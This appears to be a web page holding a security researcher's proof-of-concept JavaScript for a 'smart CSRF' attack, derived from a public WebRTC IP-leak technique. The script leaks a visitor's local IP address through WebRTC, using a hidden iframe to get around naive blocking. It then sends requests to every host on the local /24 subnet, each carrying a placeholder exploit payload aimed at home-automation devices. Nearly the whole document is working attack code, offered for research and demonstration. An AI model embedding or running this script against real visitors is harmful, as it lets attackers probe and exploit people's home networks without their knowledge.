Image

<script>
// Linkback: https://www.tripwire.com/state-of-security/off-topic/smart-csrf/
// This code is derived from a PoC I came across on GitHub: https://github.com/diafygi/webrtc-ips/blob/master/README.md
// I have only slightly modified it to assume the IP is on a /24 and iterate over the addresses with an HTTP request.
// A version of this script including the payload for a 0-day in a home automation product was demonstrated at:
// DEF CON 23 IoT Village and InfoSec Europe 2015 Intelligent Defence in a talk titled 'Smart Home Invasion'
// Interestingly enough, this code worked in Chrome even without an Internet connection to reach the STUN server.
// -- Craig Young, Security Researcher Tripwire VERT
//get the IP addresses associated with an account
function getIPs(callback){
var ip_dups = {};
//compatibility for firefox and chrome
var RTCPeerConnection = window.RTCPeerConnection
|| window.mozRTCPeerConnection
|| window.webkitRTCPeerConnection;
var useWebKit = !!window.webkitRTCPeerConnection;
//bypass naive webrtc blocking using an iframe
if(!RTCPeerConnection){
//NOTE: you need to have an iframe in the page right above the script tag
//
//<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
//<script>...getIPs called in here...
//
var win = iframe.contentWindow;
RTCPeerConnection = win.RTCPeerConnection
|| win.mozRTCPeerConnection
|| win.webkitRTCPeerConnection;
useWebKit = !!win.webkitRTCPeerConnection;
}
//minimal requirements for data connection
var mediaConstraints = {
optional: [{RtpDataChannels: true}]
};
//firefox already has a default stun server in about:config
// media.peerconnection.default_iceservers =
// [{"url": "stun:stun.services.mozilla.com"}]
var servers = undefined;
//add same stun server for chrome
if(useWebKit)
servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
//construct a new RTCPeerConnection
var pc = new RTCPeerConnection(servers, mediaConstraints);
function handleCandidate(candidate){
//match just the IP address
var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/
var ip_addr = ip_regex.exec(candidate)[1];
//remove duplicates
if(ip_dups[ip_addr] === undefined)
callback(ip_addr);
ip_dups[ip_addr] = true;
}
//listen for candidate events
pc.onicecandidate = function(ice){
//skip non-candidate events
if(ice.candidate)
handleCandidate(ice.candidate.candidate);
};
//create a bogus data channel
pc.createDataChannel("");
//create an offer sdp
pc.createOffer(function(result){
//trigger the stun server request
pc.setLocalDescription(result, function(){}, function(){});
}, function(){});
//wait for a while to let everything done
setTimeout(function(){
//read candidate info from local description
var lines = pc.localDescription.sdp.split('\n');
lines.forEach(function(line){
if(line.indexOf('a=candidate:') === 0)
handleCandidate(line);
});
}, 1000);
}
getIPs(
function(ip){
var local_regex = /10\.[0-9]+\.[0-9]+\.|192\.168\.[0-9]+\.|172\.16\./
if (local_regex.exec(ip) != null) {
var subnet = local_regex.exec(ip)[0];
for (node=1; node<256; node++) {
var url = 'http://' + subnet + node + exploit_URI_payload;
var oReq = new XMLHttpRequest();
oReq.open("get",url,true)
oReq.send();
}
}
}
);
</script>
<H1>o0o0o0o0o0o0</H1>
</HTML>
Title image courtesy of ShutterStock